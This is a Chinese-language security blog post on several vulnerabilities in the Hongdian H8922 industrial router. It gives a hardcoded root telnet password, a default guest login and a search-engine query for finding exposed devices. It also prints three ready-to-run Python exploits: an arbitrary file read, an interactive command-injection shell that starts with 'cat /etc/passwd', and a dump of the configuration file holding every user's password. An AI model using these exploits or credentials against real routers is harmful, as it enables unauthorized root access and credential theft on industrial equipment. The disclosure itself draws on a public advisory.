一:漏洞描述🐑
宏电 H8922 后台存在管理员信息泄露漏洞,攻击者使用任意账号登录后访问特殊的Url即可获取所有用户的账号和密码宏电 H8922 后台中的网络测试模块中存在命令执行漏洞。通过命令拼接执行任意命令宏电 H8922 后台存在任意文件读取漏洞,低权限用户通过漏洞可以获取任意文件内容宏电 H8922 Telnet存在硬编码的账号密码 且默认开放 5188端口连接,可以以Root身份获取权限CVE-2021-28149 ~ 28152
二: 漏洞影响🐇
宏电 H8922
三: ZoomEy🐋
ZoomEy app:"Hongdian H8922 Industrial Router四: 宏电 H8922 Telnet后门漏洞🦉
使用Telnet连接目标5188端口,账号密码为 root/superzxmn
四: 宏电 H8922 后台任意文件读取漏洞 🦉
登录后台(存在访客用户默认账号密码 guest/guest)
漏洞存在于 log_download.cgi 文件中
使用type参数读取文件并下载日志给用户,使用 ../../ 可以跳转根目录读取任意文件
import requestsimport sysimport randomimport refrom lxml import etreefrom requests.packages.urllib3.exceptions import InsecureRequestWarningdef title():print('+------------------------------------------')print('+ �33[34mPOC_Des: http://wiki.peiqi.tech �33[0m')print('+ �33[34mGithub : https://github.com/PeiQi0 �33[0m')print('+ �33[34m公众号 : PeiQi文库 �33[0m')print('+ �33[34mTitle : 宏电 H8922 后台任意文件读取漏洞 CVE-2021-28152 �33[0m')print('+ �33[36m使用格式: python3 poc.py �33[0m')print('+ �33[36mUrl >>> http://xxx.xxx.xxx.xxx �33[0m')print('+------------------------------------------')def POC_1(target_url, filename):vuln_url = target_url + "/log_download.cgi?type=../..{}".format(filename)headers = {"Content-Type": "application/x-www-form-urlencoded","Authorization": "Basic Z3Vlc3Q6Z3Vlc3Q="}try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)print("�33[32m[o] 正在请求 {}/log_download.cgi?type=../../etc/passwd �33[0m".format(target_url))if "root" in response.text and response.status_code == 200:print("�33[32m[o] 目标 {}存在漏洞 ,存在访客账号 guest/guest 成功读取 /etc/passwd �33[0m".format(target_url))print("�33[32m[o] 响应为:n{} �33[0m".format(response.text))while True:filename = input("�33[35mFilename >>> �33[0m")if filename == "exit":sys.exit(0)else:POC_2(target_url, filename)else:print("�33[31m[x] 请求失败 �33[0m")sys.exit(0)except Exception as e:print("�33[31m[x] 请求失败 �33[0m", e)def POC_2(target_url, filename):vuln_url = target_url + "/log_download.cgi?type=../..{}".format(filename)headers = {"Content-Type": "application/x-www-form-urlencoded","Authorization": "Basic Z3Vlc3Q6Z3Vlc3Q="}try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)print("�33[32m[o] {} �33[0m".format(response.text))except Exception as e:print("�33[31m[x] 请求失败 �33[0m", e)if __name__ == '__main__':title()filename = '/etc/passwd'target_url = str(input("�33[35mPlease input Attack UrlnUrl >>> �33[0m"))POC_1(target_url, filename)
四: 宏电 H8922 后台命令执行漏洞 🦉
登录后台(存在访客用户默认账号密码 guest/guest)使用 ; 命令拼接执行任意命令
POST /tools.cgi HTTP/1.1Host: xxx.xxx.xxx.xxxContent-Length: 96Cache-Control: max-age=0Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6x-forwarded-for: 127.0.0.1x-originating-ip: 127.0.0.1x-remote-ip: 127.0.0.1x-remote-addr: 127.0.0.1Connection: closeop_type=ping&destination=;cat /etc/passwd&user_options=uid%3D0%28root%29+gid%3D0%28root%29%0D%0A
import requestsimport sysimport randomimport refrom lxml import etreefrom requests.packages.urllib3.exceptions import InsecureRequestWarningdef title():print('+------------------------------------------')print('+ �33[34mPOC_Des: http://wiki.peiqi.tech �33[0m')print('+ �33[34mGithub : https://github.com/PeiQi0 �33[0m')print('+ �33[34m公众号 : PeiQi文库 �33[0m')print('+ �33[34mTitle : 宏电 H8922 后台命令执行漏洞 CVE-2021-28150 �33[0m')print('+ �33[36m使用格式: python3 poc.py �33[0m')print('+ �33[36mUrl >>> http://xxx.xxx.xxx.xxx �33[0m')print('+------------------------------------------')def POC_1(target_url, cmd):vuln_url = target_url + "/tools.cgi"headers = {"Content-Type": "application/x-www-form-urlencoded","Authorization": "Basic Z3Vlc3Q6Z3Vlc3Q="}data = "op_type=ping&destination=;cat /etc/passwd&user_options=uid%3D0%28root%29+gid%3D0%28root%29%0D%0A"try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5)print("�33[32m[o] 正在请求 {}/tools.cgi �33[0m".format(target_url))if "root" in response.text and response.status_code == 200:print("�33[32m[o] 目标 {}存在漏洞 ,存在访客账号 guest/guest 成功执行 cat /etc/passwd �33[0m".format(target_url))html = etree.HTML(response.text)cmd_test = html.xpath('/html/body/div[1]/div/div[2]/div/form/fieldset[2]/div/textarea/text()')[0]print("�33[32m[o] 响应为:n{} �33[0m".format(cmd_test))while True:cmd = input("�33[35mCmd >>> �33[0m")if cmd == "exit":sys.exit(0)else:POC_2(target_url, cmd)else:print("�33[31m[x] 请求失败 �33[0m")sys.exit(0)except Exception as e:print("�33[31m[x] 请求失败 �33[0m", e)def POC_2(target_url, cmd):vuln_url = target_url + "/tools.cgi"headers = {"Content-Type": "application/x-www-form-urlencoded","Authorization": "Basic Z3Vlc3Q6Z3Vlc3Q="}data = "op_type=ping&destination=;{}&user_options=uid%3D0%28root%29+gid%3D0%28root%29%0D%0A".format(cmd)try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5)html = etree.HTML(response.text)cmd_test = html.xpath('/html/body/div[1]/div/div[2]/div/form/fieldset[2]/div/textarea/text()')[0]print("�33[32m[o] 响应为:n{} �33[0m".format(cmd_test))except Exception as e:print("�33[31m[x] 请求失败 �33[0m", e)if __name__ == '__main__':title()cmd = 'cat /etc/passwd'target_url = str(input("�33[35mPlease input Attack UrlnUrl >>> �33[0m"))POC_1(target_url, cmd)
四: 宏电 H8922 后台管理员信息泄露漏洞 🦉
登录后台(存在访客用户默认账号密码 guest/guest)漏洞存在于 backup2.cgi 文件中
分析后可得知实际运行后将会读取 /tmp/hdconfig/cli.conf 配置文件
其中配置文件中是含有所有用户密码以及敏感配置信息的
import requestsimport sysimport randomimport reimport base64import timefrom requests.packages.urllib3.exceptions import InsecureRequestWarningdef title():print('+------------------------------------------')print('+ �33[34mPOC_Des: http://wiki.peiqi.tech �33[0m')print('+ �33[34mGithub : https://github.com/PeiQi0 �33[0m')print('+ �33[34m公众号 : PeiQi文库 �33[0m')print('+ �33[34mTitle : 宏电 H8922 后台命令执行漏洞 CVE-2021-28150 �33[0m')print('+ �33[36m使用格式: python3 poc.py �33[0m')print('+ �33[36mUrl >>> http://xxx.xxx.xxx.xxx �33[0m')print('+------------------------------------------')def POC_1(target_url):vuln_url = target_url + "/backup2.cgi"headers = {"Content-Type": "application/x-www-form-urlencoded","Authorization": "Basic Z3Vlc3Q6Z3Vlc3Q="}try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response = requests.post(url=vuln_url, headers=headers, verify=False, timeout=5)print("�33[36m[o] 正在请求 {}/backup2.cgi.... �33[0m".format(target_url))if 'service webadmin' in response.text and response.status_code == 200:print("�33[32m[o] 目标 {}存在漏洞 ,存在访客账号 guest/guest 成功读取配置文件 �33[0m".format(target_url))print("�33[36m[o] 响应为:n{} �33[0m".format(response.text))else:print("�33[31m[x] 请求失败 �33[0m")sys.exit(0)except Exception as e:print("�33[31m[x] 请求失败 �33[0m", e)if __name__ == '__main__':title()target_url = str(input("�33[35mPlease input Attack UrlnUrl >>> �33[0m"))POC_1(target_url)
参考链接:https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
五: 关于文库🦉
在线文库:
http://wiki.peiqi.tech
Github:
https://github.com/PeiQi0/PeiQi-WIKI-POC
最后
下面就是文库的公众号啦,更新的文章都会在第一时间推送在交流群和公众号
想要加入交流群的师傅公众号点击交流群加我拉你啦~
别忘了Github下载完给个小星星⭐
同时知识星球也开放运营啦,希望师傅们支持支持啦🐟
知识星球里会持续发布一些漏洞公开信息和技术文章~
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
PeiQi文库 拥有对此文章的修改和解释权如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
本文始发于微信公众号(PeiQi文库):宏电 H8922 多个漏洞公开 (CVE-2021-28149 ~ 28151)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论